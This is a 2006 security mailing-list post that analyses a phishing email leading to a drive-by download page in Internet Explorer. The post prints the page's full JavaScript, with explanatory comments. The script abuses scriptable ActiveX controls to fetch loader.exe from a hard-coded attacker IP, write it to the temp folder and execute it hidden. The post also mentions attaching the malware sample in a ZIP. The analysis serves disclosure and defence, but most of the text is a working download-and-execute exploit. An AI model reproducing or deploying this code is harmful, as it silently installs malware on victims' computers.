Attack of the Day
From: Larry Seltzer <Larry () larryseltzer com>
Date: Fri, 17 Nov 2006 14:50:16 -0500
I got an interesting attack e-mail today. At first it looked like a phish. This was the message: From: estell esmaria [mailto:siselynevin () responsebase com] Sent: Friday, November 17, 2006 12:11 PM To: horatius augustine Subject: Fifth Third Bank informs you Hello again, please visit: http://66.45.250.194/~turnoff/hi/ And it had a cyan background. Not much of a presentation. I loaded the URL from the message body in my text editor (TextPad is great for that: just File > Open and give it the URL) and the page is not that long. There's a global string array with a list of GUIDs that I've commented up. The full source for the page is below. BD96C556-65A3-11D0-983A-00C04FC29E36 - RDS Data Control AB9BCEDD-EC7E-47E1-9322-D4A210617116 - ObjectFactory Class 0006F033-0000-0000-C000-000000000046 - Outlook Data Object 0006F03A-0000-0000-C000-000000000046 - Outlook.Application 6e32070a-766d-4ee6-879c-dc1fa91d2fc3 - MUWebControl Class 6414512B-B978-451D-A0D8-FCFDF33E833C - WUWebControl Class 7F5B7F63-F06F-4331-8A26-339E03C0AE3D - WMI Object Broker 06723E09-F4C2-43c8-8358-09FCD1DB0766 - VsmIDE.DTE 639F725F-1B2D-4831-A9FD-874847682010 - DExplore Application Object, DExplore.AppObj.8.0 BA018599-1DB3-44f9-83B4-461454C84BF8 - Microsoft Visual Studio DTE Object, VisualStudio.DTE.8.0 D0C07D56-7C69-43F1-B4A0-25F5A11FAB19 - Microsoft DbgClr DTE Object, Microsoft.DbgClr.DTE.8.0 E8CCCDDF-CA28-496b-B050-6C07C962476B - VsaIDE.DTE I guess this is one of the exploits for the Microsoft XMLHTTP bug they just patched. Looking at the source, though, XMLHTTP is only used in the ordinary way, to fetch a file; the actual trick is that each of those GUIDs is an ActiveX control that exposes a CreateObject/GetObject method to script, and the page uses whichever one instantiates as a factory for Microsoft.XMLHTTP, ADODB.Stream, Scripting.FileSystemObject and Shell.Application — objects a web page is not normally allowed to script. The page loops through each of these GUIDs, creating the control and using it to create an XMLHTTP object. It uses this to download the file at http://66.45.250.194/~turnoff/hi/loader.exe, write it to the temp folder under a random eight-character .com name, and execute it — there is no shellcode or memory corruption involved, so it works on any IE where one of those controls is installed and not kill-bitted. I got the file and ran it through VirusTotal.
Only four engines said anything at all: AntiVir 7.2.0.39 11.17.2006 HEUR/Crypted BitDefender 7.2 11.17.2006 Generic.Malware.Sdldg.10CF2C7A eSafe 7.0.14.0 11.16.2006 suspicious Trojan/Worm Fortinet 2.82.0.0 11.17.2006 suspicious Hooray for Antivir, the only one with something useful to say. Here's Antivir's writeup on HEUR/Crypted: http://www.avira.com/en/threats/section/fulldetails/id_vir/2704/heur_cry pted.html I've attached the file in a ZIP file with the password 'loader' LJS ------------------------------------------------------
[[!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"]]
[[html]][[head]][[title]]Google[[/title]]
[[script type="text/javascript" language="javascript"]]
// Analysis notes (reviewer): this is a drive-by download-and-execute page, not a memory-corruption
// exploit. Each GUID below is tried as an <object> classid; any control that loads and exposes a
// CreateObject/GetObject method to script is used as a factory to build Microsoft.XMLHTTP,
// ADODB.Stream, Scripting.FileSystemObject and Shell.Application, which then fetch loader.exe,
// write it to the temp folder under a random *.com name and run it with the window hidden.
// The archive rendered '<' and '>' as '[[' and ']]' throughout (including the loop condition in
// rname()); the code is otherwise reproduced exactly as posted.

// Candidate ActiveX controls, tried in order. Labels are from the post above.
var obj_t = new Array(
    'BD96C556-65A3-11D0-983A-00C04FC29E36',   // RDS Data Control
    'AB9BCEDD-EC7E-47E1-9322-D4A210617116',   // ObjectFactory Class
    '0006F033-0000-0000-C000-000000000046',   // Outlook Data Object
    '0006F03A-0000-0000-C000-000000000046',   // Outlook.Application
    '6e32070a-766d-4ee6-879c-dc1fa91d2fc3',   // MUWebControl Class
    '6414512B-B978-451D-A0D8-FCFDF33E833C',   // WUWebControl Class
    '7F5B7F63-F06F-4331-8A26-339E03C0AE3D',   // WMI Object Broker
    '06723E09-F4C2-43c8-8358-09FCD1DB0766',   // VsmIDE.DTE
    '639F725F-1B2D-4831-A9FD-874847682010',   // DExplore Application Object, DExplore.AppObj.8.0
    'BA018599-1DB3-44f9-83B4-461454C84BF8',   // Microsoft Visual Studio DTE Object, VisualStudio.DTE.8.0
    'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',   // Microsoft DbgClr DTE Object, Microsoft.DbgClr.DTE.8.0
    'E8CCCDDF-CA28-496b-B050-6C07C962476B');  // VsaIDE.DTE

// Ask control `o` to instantiate the COM object named `n`, trying every CreateObject/GetObject
// signature one of the candidate controls might accept. Every exception is swallowed, so the
// caller only sees the object or null. The eval() is pointless (each string is a literal) —
// most likely obfuscation left over from a variant that unescape()d the z01..z06 strings below.
function CreateO(o, n) {
    var r = null;
    try { eval('r = o.CreateObject(n)') }catch(e){}
    if (! r) { try { eval('r = o.CreateObject(n, "")') }catch(e){} }
    if (! r) { try { eval('r = o.CreateObject(n, "", "")') }catch(e){} }
    if (! r) { try { eval('r = o.GetObject("", n)') }catch(e){} }
    if (! r) { try { eval('r = o.GetObject(n, "")') }catch(e){} }
    if (! r) { try { eval('r = o.GetObject(n)') }catch(e){} }
    return(r);
}

// window.onerror handler: returning true suppresses the browser's default script-error handling,
// so the many failed instantiation attempts produce no visible error dialog.
function iii() { return true; }

var iss = false;                                          // unused
uri = 'http://66.45.250.194/~turnoff/hi/loader.exe';      // payload; fetched with a random cache-busting query in DoIt()
window.onerror = iii;

// Object names split into fragments, presumably to evade naive string signatures:
// 'Scrip' + za + 'ystemObject' -> 'Scripting.FileSystemObject'; shellapp -> 'Shell.Application'.
var za = 'ting.FileS';
var z = 'plication';
var shellapp = 'Shell.Ap'+z;

// URL-encoded copies of the six eval strings used in CreateO (e.g. z01 decodes to
// "r = o.CreateObject(n)"). Nothing on this page reads them — dead code from another variant.
var z01 = "r%20%3D%20o.Creat'+'eObject%'+'28n%29";
var z02 = "r%20%3D%20o.Creat'+'eObject%28n%'+'2C%20%22%22%29";
var z03 = "r%20%3D%20o.Create'+'Object%28n%2C'+'%20%22%22%2C%20%22%22%29";
var z04 = "r%20%3D%20o.GetOb'+'ject%28%'+'22%22%2C%20n%29";
var z05 = "r%20%3D%20o.GetObject%28n%'+'2C%20%22%22%29";
var z06 = "r%20%3D%2'+'0o.GetObject%28n%29";

// a1+a2+a3+a4 -> 'ADODB.Stream' (assembled in the body script).
var a1 = 'ADO';
var a2 = 'DB.';
var a3 = 'Str';
var a4 = 'eam';

// Returns eight random alphanumerics followed by '.com'. Used both as the cache-busting query
// value and as the dropped file's name; '.com' is an executable extension, so ShellExecute 'open'
// runs the file. (Note the loop condition is '<', garbled to '[[' by the archive.)
function rname() {
    var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
    var string_length = 8;
    var randomstring = '';
    for (var i=0; i[[string_length; i++) {
        var rnum = Math.floor(Math.random() * chars.length);
        randomstring += chars.substring(rnum,rnum+1);
    }
    return randomstring + '.com';
}

// Download-and-execute step. Relies on globals set by the body script: `x` (the XMLHTTP object),
// `xml` (the <object> element whose CreateObject succeeded) and `S` (the ADODB.Stream).
function DoIt() {
    // Synchronous GET of the payload; the random query parameter defeats caching/filtering on the URL.
    x.Open('GET',uri + '?e=' + escape(rname()),false);
    x.Send();
    var fname1 = rname();
    // Scripting.FileSystemObject, again created through the abused control rather than directly.
    var f = xml.CreateObject('Scrip'+za+'ystemObject','');
    var tmp = f.GetSpecialFolder(2);          // 2 is TemporaryFolder in the FSO API -> drops into %TEMP%
    fname1 = f.BuildPath(tmp,fname1);
    // Write the raw response bytes to disk (2 = adSaveCreateOverWrite per the ADO docs).
    S.open();
    S.write(x.responseBody);
    S.savetofile(fname1,2);
    S.close();
    // Shell.Application.ShellExecute(file, args, dir, 'open', show); show = 0 keeps the window hidden.
    var Q = xml.createobject(shellapp,'');
    Q.ShellExecute(fname1,'','','open',0);
}
[[/script]][[/head]][[body]]
[[script type="text/javascript" language="JavaScript"]]
// Driver: only runs in IE. Walks every GUID; for each control that yields an XMLHTTP object it also
// creates an ADODB.Stream and calls DoIt(). There is no break after a success, so the payload may be
// downloaded and executed once per working control, and every exception is swallowed.
if (navigator.userAgent.indexOf('MSIE') != -1) {
    var ni = 0;
    while (obj_t[ni]) {
        var xml = null;
        var xml = document.createElement('object');
        guid = obj_t[ni];
        xml.setAttribute('classid','clsid:'+guid);
        // Always truthy: createElement returns an element whether or not the control loaded.
        // The real test is whether CreateO() returns anything.
        if (xml) {
            n_xml = 'Microsoft.XMLHTTP';
            try {
                var x = null;
                var x = CreateO(xml,n_xml);
                if (x) {
                    str1 = a1 + a2;
                    str1 = str1 + a3 + a4;
                    str5 = str1;                       // 'ADODB.Stream'
                    var S = xml.CreateObject(str5,"");
                    S.type = 1;                        // 1 = adTypeBinary per the ADO docs
                    str6 = 'GET';                      // unused
                    DoIt();
                }
            } catch(e){}
        }
        ni++;
    }
}
[[/script]]
[[/body]][[/html]]
Attachment:
loader.zip
Description: loader.zip